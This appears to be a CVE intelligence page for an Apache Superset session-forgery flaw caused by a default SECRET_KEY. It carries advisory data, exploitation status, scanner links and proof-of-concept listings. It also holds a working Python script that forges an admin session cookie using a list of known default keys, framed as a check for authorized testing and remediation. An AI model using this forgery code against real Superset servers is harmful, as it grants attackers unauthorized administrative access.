Vulnerability detail
Enriched intelligence for a single CVE
High
CVE-2023-27524
PUBLISHED
Apache Superset: Session validation vulnerability when using provided default SECRET_KEY
- Vendor
- Apache Software Foundation
- Product
- Apache Superset
- Published
- Apr 24, 2023
- EPSS
- —
Description
Session validation attacks are possible in Apache Superset versions up to and including 2.0.1. Installations that have not changed the default SECRET_KEY shipped in the example configuration, as the installation instructions require, let an attacker forge a valid session cookie, authenticate as an existing user and access resources they are not authorized for. Installations whose administrators have changed the default SECRET_KEY are not affected.

Every Superset installation should set a unique, securely generated random SECRET_KEY. The SECRET_KEY is used to sign all session cookies and to encrypt sensitive information stored in the metadata database, so on an existing installation a key change also requires re-encrypting those stored secrets (Superset ships a `superset re-encrypt-secrets` CLI command for this). Add a strong SECRET_KEY to your `superset_config.py` file like: SECRET_KEY = Alternatively you can set it with the `SUPERSET_SECRET_KEY` environment variable.
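The mechanism behind this advisory is that Superset is a Flask application: its `session` cookie is a signed value, and whoever knows the SECRET_KEY can mint a cookie for any user ID. The following is an added example (not Superset code and not the Nuclei or Metasploit module) that re-implements the cookie signing scheme Flask uses (itsdangerous' URLSafeTimedSerializer with salt `cookie-session`, HMAC key derivation and SHA-1), forges a cookie under a candidate key, checks a captured cookie against a list of candidate default keys, and generates a replacement key. The candidate default keys are assumptions drawn from public write-ups and must be checked against the `config.py` of the Superset version in use; the session contents are constructed for the demo.

```python
"""Forge and verify Flask-style session cookies as Apache Superset signs them.

Added example, not Superset or scanner code. Cookie format re-implements
itsdangerous' URLSafeTimedSerializer as Flask configures it (salt
"cookie-session", HMAC key derivation, SHA-1 digest). DEFAULT_SECRET_KEYS
are assumed values from public write-ups; verify them against your version.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time
import zlib
from typing import Optional

SALT = b"cookie-session"

# Assumed defaults: the key historically shipped in Superset's config.py plus
# placeholders from docs and examples that often survive copy-paste.
DEFAULT_SECRET_KEYS = [
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    "thisISaSECRET_1234",
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",
    "TEST_NON_DEV_SECRET",
]


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derived_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _signature(secret_key: str, signed_value: bytes) -> bytes:
    return _b64e(hmac.new(_derived_key(secret_key), signed_value, hashlib.sha1).digest())


def sign_session(secret_key: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Produce a cookie value Flask would accept for `session` under `secret_key`."""
    payload = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64e(compressed)  # leading dot marks a zlib-compressed payload
    else:
        body = _b64e(payload)
    ts = timestamp if timestamp is not None else int(time.time())
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + _b64e(ts_bytes)
    return (value + b"." + _signature(secret_key, value)).decode()


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the session dict if `cookie` carries a valid signature under `secret_key`."""
    value, sep, sig = cookie.encode().rpartition(b".")
    if not sep or not hmac.compare_digest(sig, _signature(secret_key, value)):
        return None
    body, _, _ = value.rpartition(b".")  # strip the timestamp segment
    payload = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(payload)


def find_default_key(cookie: str, candidates=DEFAULT_SECRET_KEYS) -> Optional[str]:
    """Return the first candidate key that validates `cookie`, or None if none does."""
    for key in candidates:
        if verify_session(cookie, key) is not None:
            return key
    return None


def generate_secret_key(nbytes: int = 42) -> str:
    """A SECRET_KEY for superset_config.py, same strength as `openssl rand -base64 42`."""
    return base64.b64encode(secrets.token_bytes(nbytes)).decode()


if __name__ == "__main__":
    # Constructed demo: a cookie an attacker who knows the default key can mint
    # for Flask-Login user id 1 (typically the first admin account).
    forged = sign_session(DEFAULT_SECRET_KEYS[0], {"_user_id": "1", "_fresh": True})
    print("forged cookie:", forged)
    print("validates under a known default key:", find_default_key(forged) is not None)
    print("replacement SECRET_KEY:", generate_secret_key())
```

To check an instance you are authorized to test, take the `session` cookie the login page sets and pass it to `find_default_key`; a non-None result means any visitor can forge an administrator session, which is exactly what the Nuclei template and Metasploit module listed below look for. A None result against this list does not prove the key is strong, only that it is none of these candidates.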
CVSS scores
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
Exploitation status
Exploited in the wild
Recorded 2024-01-08 (UTC)
SSVC decision points
- Exploitation
- active
- Automatable
- No
- Technical impact
- total
References
- https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk
- https://www.openwall.com/lists/oss-security/2023/04/24/2
- https://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html
- https://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html
Known exploited vulnerability sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| CISA | Jan 08, 2024 |
Scanner integrations
| Scanner | Reference | Detected |
|---|---|---|
| Metasploit | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb | Apr 28, 2025 |
| Nuclei | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-27524.yaml | Apr 25, 2025 |
Potential proof of concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2024-05-11 12:29:08 UTC · 2 stars
Apache Superset - Authentication Bypass
github · Created 2024-05-11 12:19:55 UTC · 1 star
Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)
github · Created 2023-09-08 06:15:00 UTC · 24 stars
github · Created 2023-05-08 16:50:08 UTC · 11 stars
Apache Superset Auth Bypass (CVE-2023-27524)
github · Created 2023-05-04 21:43:48 UTC · 3 stars
Perform With Apache-SuperSet Leaked Token [CSRF]
github · Created 2023-04-27 07:31:40 UTC · 3 stars
Apache Superset Auth Bypass Vulnerability CVE-2023-27524.
github · Created 2023-04-25 04:59:05 UTC · 103 stars
Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset
Timeline
- CVE ID Reserved
- CVE Published to Public (Apr 24, 2023)
- Added to KEVIntel (Jan 08, 2024)
- Detected by Nuclei (Apr 25, 2025)
- Detected by Metasploit (Apr 28, 2025)